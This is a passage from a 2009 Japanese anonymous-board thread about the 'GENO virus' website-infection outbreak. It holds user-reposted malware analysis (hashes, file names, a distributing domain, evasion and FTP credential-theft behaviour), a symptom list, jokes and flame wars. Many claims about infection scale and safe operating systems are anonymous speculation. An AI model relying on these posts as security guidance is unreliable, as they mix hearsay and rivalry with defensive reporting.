・東海村臨界事故の原因の1つである
・重篤なやけどの原因となりうる
・末期がん患者の悪性腫瘍から検出される 
・その危険性に反して、DHMOは頻繁に用いられている
・工業用の溶媒、冷却材として用いられる 
・多くの材料の腐食を進行させる
・各種の動物実験に用いられる 
・現在も防虫剤の散布に用いられており土壌入換え後も
DHMOは残留し産物に悪影響を与える
・欧州では6000人の死者が出ている
・戦後の日本の広島市内だけで1,100人前後が死亡している
287名無しさん@九周年:2009/05/17(日) 22:29:04 ID:t5C/3fzq0
>>269
ありがとうございます!
Adobeとフラッシュはもうアップデートしました
288名無しさん@九周年:2009/05/17(日) 22:29:08 ID:To/NbSUwO
ニフティセキュリティで確認・・・アウトでした。

駆除、削除してもすぐに復活。

バックアップして、しばらくネット謹慎です。

皆さんも、ニフティセキュリティで確認してみ
289名無しさん@九周年:2009/05/17(日) 22:30:11 ID:O8CcXZBv0
砂箱か仮想からなら安全?
290名無しさん@九周年:2009/05/17(日) 22:30:13 ID:oZ6HUDrg0
サイトを見ていなければ大丈夫じゃないのか。
カスペルスキーの最新版常駐させて、スキャンして大丈夫だったら、心配無い?
291名無しさん@九周年:2009/05/17(日) 22:31:27 ID:ywL/MaBL0
>>281
こういうセキュリティ関連のスレで本音を言って欲情しようとするのは
実に卑猥なやりくちだ
私はこういう輩を軽蔑する
292名無しさん@九周年:2009/05/17(日) 22:31:49 ID:To/NbSUwO
だからニフセキュリティで確認しろってwww
293名無しさん@九周年:2009/05/17(日) 22:31:55 ID:6uNK4CGD0
>>283
なんのことか分からんかったからググっちゃったじゃないかw

とりあえず同人板のスレでGENOウイルス云々言ってたからまとめ見て確認した
サイトの頭にでっかく注意喚起も書いといたよ
294名無しさん@九周年:2009/05/17(日) 22:32:10 ID:5RuLx0eD0
再起動してみてブルー画面でたらアウト
VISTAは条件によるがほぼ無傷
295名無しさん@九周年:2009/05/17(日) 22:32:11 ID:spcZi1BU0
これまでのあらすじ

04/04(土)
PC一般板のGENOスレで「GENOのサイトが改竄されている」との報告が出る。(10:43)
スレでの報告から、GENOサイトにアクセスするとウィルスに感染する可能性があることが明らかになる。
ν速にスレが立つ。(20:26)
改竄されたまま一日を終える。

04/05(日)
この日の夜から短縮URLによる各板へのウィルス爆撃が本格化。多数の犠牲者が出る。
GENOの店舗に赴いた有志が店員にこの一件を尋ねる。「Webのことは店舗ではわかりません」
セキュリティ板で通販サイト juicyrock.co.jp もGENOと同様の改竄を受けていることが報告される。
楽天のショップ www.rakuten.ne.jp/gold/i-na/ でGENOウィルスを検出したという話題が出る。
GENOサイトは完全放置のまま1日が終わる。

04/06(月)
社員がようやく出社してきたのか、サイトがメンテナンス中になる。(10:00頃)
※ただし「メンテナンス中」に切り替えたのはトップを含む数ページのみで、
未だ改竄された商品ページなどにアクセス可能だった。

価格.comなど価格比較サイトからGENOへのリンクが消える。
GENOウィルス事件をガジェット通信が報じる。livedoor、exciteに配信される。(12:32)
juicyrock.co.jp が403になる。その後復旧、「お詫び」が発表される。
www.rakuten.ne.jp/gold/i-na/ のページが真っ白に。その後何事もなく再開。
GENOが再開。「サーバーに一部不具合がございました」(20:20頃)
再開したものの、未だ改竄されたままであることが報告される。その後しばらくして正常に。

04/07(火)
GENO、再度改竄される。(8:00頃)

以下は、http://www29.atwiki.jp/geno/pages/21.html でお読みくださいw
296名無しさん@九周年:2009/05/17(日) 22:32:37 ID:GSOwuAeJO
GoogleかYahoo!でニュースにあげてくれーー

ageage
297名無しさん@九周年:2009/05/17(日) 22:32:44 ID:UpEVV3Oa0
他の板見たら怪しいアドレスてんこ盛りでワラタw
298名無しさん@九周年:2009/05/17(日) 22:33:23 ID:buzMpw6xO
お前らー

東方
ボカロ

大手サイト感染済みだからなー
踏んだニコ厨はPCクリーンインスコしとけよー
299名無しさん@九周年:2009/05/17(日) 22:33:25 ID:fV/QhQpn0
>>110
これを他に流用する馬鹿が絶対出てくる
300名無しさん@九周年:2009/05/17(日) 22:33:56 ID:s4nFNlrZP
>>282
システムじゃなくても自身のhomeディレクトリなら書き換えられるという言い回しですか?
301名無しさん@九周年:2009/05/17(日) 22:34:08 ID:ywL/MaBL0
>>295
ちょw
事実だしGENOの態度はムカツクけど
今回の蔓延の件とGENOHP感染が直接関係あるかわからないのに
なんて偏った情報www
302名無しさん@九周年:2009/05/17(日) 22:34:35 ID:PyzgRQgk0
>>255
火狐やオペラでも感染する
303名無しさん@九周年:2009/05/17(日) 22:36:56 ID:PyzgRQgk0
「小林製薬のサイトは見てないから大丈夫」とか言う奴は情弱。
既に国内だけで100以上のサイトに感染が広がっている。
明日になればその十倍〜数百倍以上になる見込み。
304名無しさん@九周年:2009/05/17(日) 22:36:59 ID:r3xcW/UI0
ここのサーバーは何で感染した訳?
microsoftのサーバーOSだったの?
305名無しさん@九周年:2009/05/17(日) 22:38:03 ID:yigvtAXW0
いまどきWindowsでネットとかどんだけ情弱なんだよw
わけわかんないことで時間と金いくら無駄にしてるか考えてみろよw

306名無しさん@九周年:2009/05/17(日) 22:39:04 ID:GSOwuAeJO
あげ続ける
307名無しさん@九周年:2009/05/17(日) 22:39:49 ID:agKyD87CP
>>301
GENOが蔓延を助けたのは事実。
なんら偏ってない。
「キャッシュ削除しとけば大丈夫」みたいな説明しかしなかったために、
それを鵜呑みにした利用者が自分のHPを感染させ、さらに蔓延させてる。
308名無しさん@九周年:2009/05/17(日) 22:40:10 ID:q/7KjPZU0
>>305
ナに使ってるの?
309名無しさん@九周年:2009/05/17(日) 22:41:37 ID:PzigguW70
>>304
今回サーバーは関係ない。
コンテンツの更新用PCがウイルス感染して汚染されたソースをサーバーにアップした。
310名無しさん@九周年:2009/05/17(日) 22:41:58 ID:V/Dj5MjT0
できるだけネサフしないようにしないとな
311名無しさん@九周年:2009/05/17(日) 22:42:27 ID:K8jkbOL00
>>304 >>307
ん〜と、
1. 感染しているサイトを開いたPCが感染。
2. そのPCで自分のサイトをいじる(ファイルのアップロード等)。
3. その結果自分のサイトも感染。
4. そのサイトを見た人にも感染が広がっている。

……ってことでOK?
ついでにage
312名無しさん@九周年:2009/05/17(日) 22:42:31 ID:r3xcW/UI0
>>309
なるほど thx!!
313名無しさん@九周年:2009/05/17(日) 22:42:38 ID:7ljK8XR20
GENOってさぁ・・・自鯖で自ドメイン?
もし仮に拡散の元凶であったら
賠償とかあるのかな?
314名無しさん@九周年:2009/05/17(日) 22:42:45 ID:WcMT1ZAAO
mac2台とwin2台所有してるがネットはもう携帯電話でしかしてない
315名無しさん@九周年:2009/05/17(日) 22:44:40 ID:r3xcW/UI0
>>311
thx!
おいらもage

今まとめwikiすごく重いね
316名無しさん@九周年:2009/05/17(日) 22:45:02 ID:bLpL+J+T0
断崖の頂上に浮かぶマリア像は

小林製薬の糸ようじ
317名無しさん@九周年:2009/05/17(日) 22:45:08 ID:s4nFNlrZP
閲覧ウイルスに新型ウイルスに、どんだけニュー速+にウイルススレあるんだよ
318名無しさん@九周年:2009/05/17(日) 22:47:11 ID:GSOwuAeJO
早く★2になあれ。

もっと目立つスレタイになりますように。
319名無しさん@九周年:2009/05/17(日) 22:47:27 ID:m5beBtZT0

マックに替えて悠々とエロサイト巡り中のオイラが通りますよ・・・


320名無しさん@九周年:2009/05/17(日) 22:47:35 ID:spcZi1BU0
>>304
BIG-server.com binboserver.com メンテナンス / 障害報告
Lastupdate : 2009/05/14 19:07

今回改ざんを受けたのは【ぷろじぇくと ぞうさん】のトップページです。
http://www.maido3.com/server/zousan/index.html

その後の調査の結果では【ぷろじぇくとぞうさん】を更新した
2009年5月13日午後6時30分以降に改ざんされた可能性が高いと思われます。

このJavaスクリプトは、本来のサイトとは違うサイトから
ウィルスやスパイウェアなどをダウンロードするものです。

このため期間内に【ぷろじぇくとぞうさん】にアクセスされた方の
パソコンに感染の恐れがあります。

大変お手数をおかけいたしますが、お心当たりがございましたら
ご利用のパソコンの安全をご確認ください。

maido3.com ホームページでウィルスに感染した恐れがある場合の対応について
http://www.maido3.cc/server/release/2009/200905082023.html#03


弊社では引き続きウェブページの改ざんが行われた原因と経緯を調べ、
再発防止に向けた対応を行います。
321名無しさん@九周年:2009/05/17(日) 22:49:37 ID:V/Dj5MjT0
まだまだ広がるのかな?
とりあえず慌てないのが一番なのかな?
322名無しさん@九周年:2009/05/17(日) 22:50:12 ID:lzkrrbW50
>>39
化粧品会社のサイトは有無を言わさず
クソ思いFlashが作動する
馬鹿女は気にしないんだろうけど
映画配給関連だと、いきなり映画の予告再生とかさ
いきなり爆音がして何かと思うわ
二度と見たくないわな
323名無しさん@九周年:2009/05/17(日) 22:50:47 ID:Gz7wcEUtO
マック・ビスタ・マイクロソフト最新連合大勝利!
XP涙目w
324名無しさん@九周年:2009/05/17(日) 22:52:19 ID:FV8eoOlz0
>>31
JavaScriptはJSと略せ
325名無しさん@九周年:2009/05/17(日) 22:53:48 ID:kQXvOls5O
糸ようじ!
326名無しさん@九周年:2009/05/17(日) 22:54:23 ID:V1S3A2LC0
>>324
じょ…女子小学生……
327名無しさん@九周年:2009/05/17(日) 22:55:21 ID:5PY6KFWv0
2000,XP,(VISTA?)でなければおけ?
会社のはXPだわん
328名無しさん@九周年:2009/05/17(日) 22:56:51 ID:19r9ZuwXO
サイトの改ざん被害が糸ようじ
小林製薬の糸ようじ
329名無しさん@九周年:2009/05/17(日) 22:56:52 ID:d2OKGDDf0
ウィルスバスター入れてますが、防げますか?
330名無しさん@九周年:2009/05/17(日) 22:57:15 ID:ZxOtT8x60
軽くて好きなんでAdobe5.0使ってるんだが
危険なら最新にした方がいいとは思うけど

むしろ5.0ぐらいだと既に古くて相手にさえされてない気も
そして最新にすると今度
むしろ最新版の脆弱性を狙われるような気がするし

どう思う?
自分の好き嫌いだけでは判断しかねてるので
ぜひ意見を聞いてみたいんだが
331名無しさん@九周年:2009/05/17(日) 22:57:55 ID:dg3Mksro0
はじめてvistaで良かったと思った
332名無しさん@九周年:2009/05/17(日) 22:58:57 ID:Gz7wcEUtO
ここで聞くよりセキュ板いけ
GENOが蔓延させてからもうずっとヤバイ状態なのに今頃+にスレ立った所でに手遅れ
333名無しさん@九周年:2009/05/17(日) 23:00:20 ID:buzMpw6xO
まだまだ広がるんじゃなくて
もうとっくにヤバいレベルで広がってます

クレカパス抜かれたりするからきをつけろよ

因みにノートン先生他セキュリティーソフト全スルーだからな
334名無しさん@九周年:2009/05/17(日) 23:00:58 ID:ONbLLSKl0
ここはどっちかというと周知役かな?
”安易にリンク踏むとやべぇ!”って事実だけでも・・・
335名無しさん@九周年:2009/05/17(日) 23:01:16 ID:aEKDYIGD0
VistaはNT3.51の遺志を継いだOSだからな
7では多少堅牢生は落ちるだろうが
336名無しさん@九周年:2009/05/17(日) 23:01:45 ID:3PVmaavh0
企業サイトもあちこちやられて、今現在まだ某出版社は感染したまま。
けっこうな騒ぎになってたのに何日も経たないとスレ立てなかったここの記者もどうかと。
まったく危機感足りないよなw
337名無しさん@九周年:2009/05/17(日) 23:01:47 ID:Kfvmxa+T0
>>311
ちょっと違う>>55見れ
小林製薬の中のPCがウィルス感染してパス盗まれ
そのパスでサーバにFTPでウィルスアップロードされた
他の感染サーバも同じかどうかは知らない

>>324
JScriptもまとめてJSに出来るから女子小学生でも安心だな
338名無しさん@九周年:2009/05/17(日) 23:02:49 ID:V/Dj5MjT0
>>331
vistaだからって抜かるなよ?
感染した奴が知るやら云々、亜種で感染するかもしんないし

ぷりんてぃん感染?ワロスwwwwwwwwwwwwwwww
339名無しさん@九周年:2009/05/17(日) 23:03:41 ID:dhcilxrp0


>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。


340名無しさん@九周年:2009/05/17(日) 23:03:42 ID:spcZi1BU0
>>336
その 某出版社 ってのちゃんとここで名前出してあげないと
知らないで見に行って感染する人出てくるよ
リンク入れる必要は無いけど、感染確認情報はハッキリとおねがい
341名無しさん@九周年:2009/05/17(日) 23:04:38 ID:JYjupt9V0
>>340
成美堂出版だっけ、まだ対応して無いのか
342名無しさん@九周年:2009/05/17(日) 23:04:52 ID:Kfvmxa+T0
ぷりんてぃんナツカシス
ググったらWikipediaに解説ページまであるし
343名無しさん@九周年:2009/05/17(日) 23:04:56 ID:Gz7wcEUtO
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染

ギョワー
344名無しさん@九周年:2009/05/17(日) 23:06:11 ID:5PY6KFWv0
あんまり盛り上がってないのん
芸スポ板いったら松本人志結婚だってね
345名無しさん@九周年:2009/05/17(日) 23:07:01 ID:HH6PqBvv0
解析進んだみたいだけどどうにかなるのかこれ
346名無しさん@九周年:2009/05/17(日) 23:07:29 ID:Kfvmxa+T0
>>344
女と結婚したとは驚いた
347名無しさん@九周年:2009/05/17(日) 23:08:05 ID:bLpL+J+T0

  糸  小  改  ウ
  よ  林  ざ  ェ
  う  製  ん  ブ
  じ  薬  被  サ
     の  害  イ
         に  ト
            の
348名無しさん@九周年:2009/05/17(日) 23:09:15 ID:BfaJ5pk00
てか小林製薬は外部からのFTP空いてたのね?
349名無しさん@九周年:2009/05/17(日) 23:11:35 ID:JYjupt9V0
401 192.168.0.774 [sage] 2009/05/17(日) 22:38:51 ID:N9SKEU4J0
 え〜、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
 作成されるファイルを仮想PCで確保してみました。
 ベンダーに提出するかどうかの判断は各自にお任せします。(一応、KasperskyとAVIRAには送ってあります。)

 muvl.exe (元の名前 muvl.nug) - ランダム作成らしい。
  MD5 : 3862b349b9b5c9283925e181ff9f5bf8
  http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1a (2/40)

 sqlsodbc.chm - ただのダミーファイルです。(中身は無意味なテキストと空白)
  MD5 : 34cd61d83853e511f0a28027f639a1c9
  http://www.virustotal.com/jp/analisis/395c9f2d6d6d38525fb24b3722664bfa (0/40)

 muvl.exeは、中身に合わせて拡張子を変えてあります。(ベンダー提出時に捨てられないように)

 gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
 対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。

 sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
 感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
 ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。

 あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
 バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。

 このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
 するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。
350名無しさん@九周年:2009/05/17(日) 23:13:07 ID:Kfvmxa+T0
>>348
自鯖じゃなくてレン鯖かホスティング
IP制限もしてなかったんだろうねこの書き方じゃ
制限してても内部のPCがbot感染したらそこを串にされる可能性あるけど
FTPじゃなくてSSHだったとしても秘密鍵盗まれたら同じだし
351名無しさん@九周年:2009/05/17(日) 23:13:31 ID:Gz7wcEUtO
ぷりんてぃんもXPだったのかな
352名無しさん@九周年:2009/05/17(日) 23:13:58 ID:f+QWz3QW0
何か結局一日中、セキュ板同人板その他色々な板に張り付いてROMってて一日が終わったw
353名無しさん@九周年:2009/05/17(日) 23:14:06 ID:cwXPGcJB0
今頃知ったわ。
こんなことニュースでやってたっけ?
セキュリティのこと何も知らずにネットやってるからこわいな…。
親はウィルスの存在さえ知らずにネットしてるし…。
354名無しさん@九周年:2009/05/17(日) 23:14:46 ID:dg3Mksro0
>>349
こええええええええ
このウイルス本気でタチ悪いな
頼むからもっとスレ伸びて目立ってくれ
355名無しさん@九周年:2009/05/17(日) 23:15:17 ID:V/Dj5MjT0
>>351
チェックしに行ってくれよ俺怖い

2ch感染とかいったら大変なことだなw
ごめん冗談にならんね
356名無しさん@九周年:2009/05/17(日) 23:15:33 ID:spcZi1BU0

6 名前:GENOウイルス@お腹いっぱい :09/05/17 18:21:58 ID:di7dr/Jr
2月に私のPCが感染
特殊清掃系のサイトから感染
GENOで言われてる症状とまったく同一でした
最終的にはリカバリしか手の内ようがないと判断しリカバリ済み
この時ノートンでは感知しなかった、ノートンがあるから安心してたのに

先週は友人が感染したといってました
友人は同人系のサイトから感染、同じくノートン入れてたが
感知せず。Cドライブのみリカバリとのこと

感染時のPCの様子
レジストリ、コマンドは立ち上がらず
セキュリティサイト及びスパイウェア系サイト繋がらずエラーになる
フリーズして勝手に電源が切れてしまう
起動時に頻繁に青い画面が出てくる



特殊清掃系とはどこぞやw
まぁ、閲覧者は少なそうだけど
357名無しさん@九周年:2009/05/17(日) 23:16:47 ID:f+QWz3QW0
>>354
「GENO」で検索してたから+に立ってるの気付かなかったくらいだからな・・・
358名無しさん@九周年:2009/05/17(日) 23:16:58 ID:JYjupt9V0
平たく言うと一般に出回ってる駆除ソフトは基本的にパターンマッチで削除する
だけどこのGENOウイルスはそれをごく短い周期で変えてるから
今のとこどうやって対応すればいいのか分からん状態
変化に規則性があればいいんだが
359名無しさん@九周年:2009/05/17(日) 23:17:55 ID:B/k6bY6T0
うはwwwwwwwwwwwwwwww空気感染したwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
360名無しさん@九周年:2009/05/17(日) 23:18:06 ID:dg3Mksro0
親に注意しろって言ったら
「そのくらい自分で調べられる、馬鹿にするな」ってキレられたwww
ついこの前「拡張子って何?」って聞いてきた情弱のくせにwwwwwwwwwww
361名無しさん@九周年:2009/05/17(日) 23:18:07 ID:Kfvmxa+T0
カンだけど特殊清掃系は死体画像サイトの事じゃね?
362名無しさん@九周年:2009/05/17(日) 23:18:37 ID:JCS5XbZm0
今日の糸ようじスレはここですか?
363名無しさん@九周年:2009/05/17(日) 23:18:44 ID:8HqP18sh0
364名無しさん@九周年:2009/05/17(日) 23:19:53 ID:oSe49aWO0
>>282
それをいうならWindowsも同じ理屈なんだがw
365名無しさん@九周年:2009/05/17(日) 23:20:06 ID:spcZi1BU0
>>361
・・・まったく、腐女子のすることは・・・w
366名無しさん@九周年:2009/05/17(日) 23:20:49 ID:GSOwuAeJO
他の賑やかなスレに、このスレを告知して回ってるよ。
マジやばい。
367名無しさん@九周年:2009/05/17(日) 23:21:09 ID:dhcilxrp0
>>360
まあWindowsでネットやってる時点で情弱だわな・・・
368名無しさん@九周年:2009/05/17(日) 23:21:55 ID:SsNeMIFG0
>>1
ハルヒが描いたSOS団のロゴ、それを貼り付けたHPを見ると・・・
369名無しさん@九周年:2009/05/17(日) 23:21:58 ID:cwXPGcJB0
世間は新型インフルエンザでネットの世界はGENOウィルス…
後者の方がこわいな、自分には
370名無しさん@九周年:2009/05/17(日) 23:21:58 ID:nYDmij9+0
通りすがりのWinMEだお
371名無しさん@九周年:2009/05/17(日) 23:22:14 ID:V/Dj5MjT0
現実では豚インフルエンザ
仮想ではGENO

忙しい
372名無しさん@九周年:2009/05/17(日) 23:22:49 ID:HH6PqBvv0
まとめサイトの転載ね

主な症状
* sqlsodbc.chmを改変
* cmd.exe、regedit.exeが起動不能
* 一部のアンチウイルスソフトが更新不能
* 特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
* ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
* Googleの検索結果を改竄(リンクを弄る)
* explorer.exeや一部のブラウザが異常終了
* Acrobatが勝手に起動
* PDFファイルやシステムファイルが増殖
* CPU、メモリ使用率がUP
* 再起動時にBSOD(=Blue Screen Of Death、青いエラー画面)
* タスクトレイから常駐アイコンが消える(主にセキュリティソフト関係)

感染・改竄の流れ
* 「感染したサイト」を見ると自分のPCも感染する
* 「感染した自分のPC」で感染していないサイトを見てもそのサイトは感染しない
* 「感染した自分のPC」でサイトの更新をしている人はパスが抜かれるので、そのサイトが感染される
* 「感染したサイト」を感染していないPCで別の人が見ると(ry
373名無しさん@九周年:2009/05/17(日) 23:23:00 ID:Kfvmxa+T0
>>365
女は人間の死に性的興奮をおぼえるらしいからな
通夜の席は艶の席
374名無しさん@九周年:2009/05/17(日) 23:23:36 ID:spcZi1BU0
しかしGENOウイルスの作成者ってマジ頭いいな
こんなウイルスばら撒いてる暇にもっと金になる仕事やればいいのに・・・

ってクレカの番号抜いたりできるからそれで金儲け?w
375名無しさん@九周年:2009/05/17(日) 23:23:51 ID:7CPX9kUh0
通常は制限ユーザーで仕事。
これ最強
376名無しさん@九周年:2009/05/17(日) 23:24:39 ID:JYjupt9V0
>>374
マジで中国黒社会当たりのヤクザ子飼いのクラッカーが詐欺用に作ったのかもな
377名無しさん@九周年:2009/05/17(日) 23:24:57 ID:dg3Mksro0
とりあえず次スレは(小林製薬)いらんな
大手企業サイトが次々と感染、くらい書いていい
378名無しさん@九周年:2009/05/17(日) 23:25:05 ID:ieeYRilW0
>>178
個人のpcだ。
379名無しさん@九周年:2009/05/17(日) 23:25:12 ID:lzkrrbW50
FX3はNoscript使ってるけど
IEはどこいじればいいんだっけ、設定でfaildにできたっけ?
あんまり使ってないから忘れた
380名無しさん@九周年:2009/05/17(日) 23:26:46 ID:spcZi1BU0
>>376
どこの企業だか忘れたけど、アメリカで自社サイトを攻撃したハッカーを
セキュリティ担当者として採用したという話聞いたことあるな
381名無しさん@九周年:2009/05/17(日) 23:27:29 ID:Gz7wcEUtO
ビスタデフォのユーザーアクセスコントロール有効なら大丈夫
切ってた自称情強は涙目w
382名無しさん@九周年:2009/05/17(日) 23:28:05 ID:Kfvmxa+T0
>>380
最近じゃあまり聞かないよそういうの
アメリカで自社サイトに侵入テストしたセキュリティ担当者が
問答無用でクビになった話なら知ってるけど
383名無しさん@九周年:2009/05/17(日) 23:28:52 ID:MzxzxDd80
>>364

ところがWindowsはroot(管理者)権限でアプリも動かすことが推奨なんだなw
だからアプリの穴、即システムの穴になる。
Vistaでようやくアプリ=一般権限、システム=管理者権限に分けたが、
今度は今まで使えてたアプリが動かなくなるというマヌケっぷり。


384名無しさん@九周年:2009/05/17(日) 23:29:34 ID:oSe49aWO0
>>382
侵入テストじゃなくて侵入な
承諾を得てからやるのが侵入テストで
その場合は首になり得ない
385名無しさん@九周年:2009/05/17(日) 23:29:49 ID:ZxOtT8x60
Vistaが珍しく評価されたが
なんかMSの企みなんじゃねーの?
386名無しさん@九周年:2009/05/17(日) 23:30:01 ID:oSe49aWO0
>>383
いまどきVistaより前の話されてもw
387名無しさん@九周年:2009/05/17(日) 23:30:26 ID:D3N5RPEE0
とりあえずavast!では何も出なかったが心配だな
388名無しさん@九周年:2009/05/17(日) 23:30:40 ID:BfaJ5pk00
>>350
ただまあ、各種SSHクライアントの挙動を監視して秘密鍵ゲットするのは敷居高いわな
トラフィック監視ですむFTPやHTTPの盗聴のがお手軽よね
389名無しさん@九周年:2009/05/17(日) 23:32:57 ID:64hL7bHeO
明日、会社大変そうだなー。
感染してなきゃいいが、間違いなく感染してると思われ。
390名無しさん@九周年:2009/05/17(日) 23:34:02 ID:spcZi1BU0

401 192.168.0.774 [sage] 2009/05/17(日) 22:38:51 ID:N9SKEU4J0
 え〜、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
 作成されるファイルを仮想PCで確保してみました。
 ベンダーに提出するかどうかの判断は各自にお任せします。(一応、KasperskyとAVIRAには送ってあります。)

 muvl.exe (元の名前 muvl.nug) - ランダム作成らしい。
  MD5 : 3862b349b9b5c9283925e181ff9f5bf8
  http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1a (2/40)
 sqlsodbc.chm - ただのダミーファイルです。(中身は無意味なテキストと空白)
  MD5 : 34cd61d83853e511f0a28027f639a1c9
  http://www.virustotal.com/jp/analisis/395c9f2d6d6d38525fb24b3722664bfa (0/40)
 muvl.exeは、中身に合わせて拡張子を変えてあります。(ベンダー提出時に捨てられないように)

 gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
 対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。
 qlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
 感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
 ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。

 
 あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
 
 バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。

 このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
 
 するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。
391名無しさん@九周年:2009/05/17(日) 23:34:19 ID:cwXPGcJB0
そんなに感染してるんだ
新型インフルエンザよりもやばそう
392名無しさん@九周年:2009/05/17(日) 23:35:02 ID:0KnEB8ZsO
>>380
日本でもUG TOPってアングラサイトの管理人がセキュリティ会社開業したけど。
393名無しさん@九周年:2009/05/17(日) 23:36:05 ID:Kfvmxa+T0
>>388
トラフィック監視じゃなくてキーロガーだと思う
それならパスフレーズも盗めるし、秘密鍵を暗号化していなければイチコロ
やっぱりワンタイムパスワードも併用しないとだめかなあ
394名無しさん@九周年:2009/05/17(日) 23:36:16 ID:JYjupt9V0
>>392
んな泥棒の立てた警備会社に仕事頼む人居るのか
395名無しさん@九周年:2009/05/17(日) 23:38:13 ID:ONbLLSKl0
pdfは使わないからアンインスコしたがFlashは悩む・・・
396名無しさん@九周年:2009/05/17(日) 23:39:38 ID:dhcilxrp0
>>385

別にVistaが評価されてるわけじゃないよ。
XPでもユーザーを一般権限にして使えば感染は避けられる。
でも今まで使ってたアプリも動かなくなる可能性が大。
Vista同様にねw

397名無しさん@九周年:2009/05/17(日) 23:39:43 ID:0KnEB8ZsO
>>383
>今まで使えてたアプリが動かなくなるというマヌケっぷり
OSがアップグレードしたらサポートしきれないアプリが出て当たり前だろ

398名無しさん@九周年:2009/05/17(日) 23:40:04 ID:itXukt220
>>31
つ、つられないからねっ!
399名無しさん@九周年:2009/05/17(日) 23:40:14 ID:r3xcW/UI0
400名無しさん@九周年:2009/05/17(日) 23:40:18 ID:D3N5RPEE0
結構重大なことだ思うけど全然スレ伸びねぇな
401名無しさん@九周年:2009/05/17(日) 23:42:36 ID:Kfvmxa+T0
セキュリティは儲からない
セキュリティのスレは伸びない
これ常識
402名無しさん@九周年:2009/05/17(日) 23:42:43 ID:ZxOtT8x60
>396
へーなるほどなあ
>>383もだけど
XPの一般権限と管理権限
なぜVistaで動かないのが多いのかってのは
そういう理屈だったんだ

また一つ賢くなったよありがとう
顧客に玄人っぽく偉そうに話ができる
403名無しさん@九周年:2009/05/17(日) 23:43:46 ID:Gz7wcEUtO
400
だってこのスレタイじゃ誰も興味もたんわ
ま素人が興味もったらもったでパニックになるだけだがな
404名無しさん@九周年:2009/05/17(日) 23:43:58 ID:2vTllxSD0
>>380
ゴルゴに出てきたナカヤマは自分のすごさを知らずにNSAに守られてるけどな。
405名無しさん@九周年:2009/05/17(日) 23:44:30 ID:TjhD+hme0
こえー
ネットの世界でも引きこもらなきゃならんのか・・・
406名無しさん@九周年:2009/05/17(日) 23:44:33 ID:0YxTjUB10
製薬会社なんだからワクチン作成汁
407名無しさん@九周年:2009/05/17(日) 23:44:52 ID:oSe49aWO0
>>402
でもVistaで動かないのって
自作とか素人の作ったフリーソフトとかであって

商用ソフトでいまどき動かないのは皆無
408名無しさん@九周年:2009/05/17(日) 23:45:17 ID:spcZi1BU0
こういう報告があがってた

433 名前:401[sage] 投稿日:2009/05/17(日) 23:26:41 ID:N9SKEU4J0
>>416
嫌なことに、特に異変がない。 
cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe,レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。

あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。

これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。 
同人板その他、パンデミック状態になったの理解できるわ。





感染したことに自覚症状がないなら、騒ぎが広まらないのもわかるw
409名無しさん@九周年:2009/05/17(日) 23:45:52 ID:/dh4sTucO
>>400
スレタイが悪いし、ageる奴が少ないし、ニュースに出ないし
かくいう俺も、ついさっき同人サイトでこのスレ知ったし
これからこのウイルスの情報が広がる流れだな

ヤホーとニコニコが伝えるだけでも、一気に広まるだろうけど、なにしてるんかね
410名無しさん@九周年:2009/05/17(日) 23:45:54 ID:ONbLLSKl0
こうしてる間にも知らずにボコボコ感染してると予想
411名無しさん@九周年:2009/05/17(日) 23:46:49 ID:V/Dj5MjT0
>>408
つまり何だそれはあれか

あれか
412名無しさん@九周年:2009/05/17(日) 23:47:25 ID:N+he6qy+0
このクレカのパスとかの送信先を割り出せば犯人が居るんじゃないの?
413名無しさん@九周年:2009/05/17(日) 23:47:49 ID:0KnEB8ZsO
>>379
NOSCRIPTって使う意味ある?
最初にスクリプトを弾いてくれるものの、危険か
どうかの判別まではしてくれないから
結局弾いたサイトのスクリプト使用を許可しちゃうんだよな
414名無しさん@九周年:2009/05/17(日) 23:48:25 ID:ZxOtT8x60
>>407
えーでも
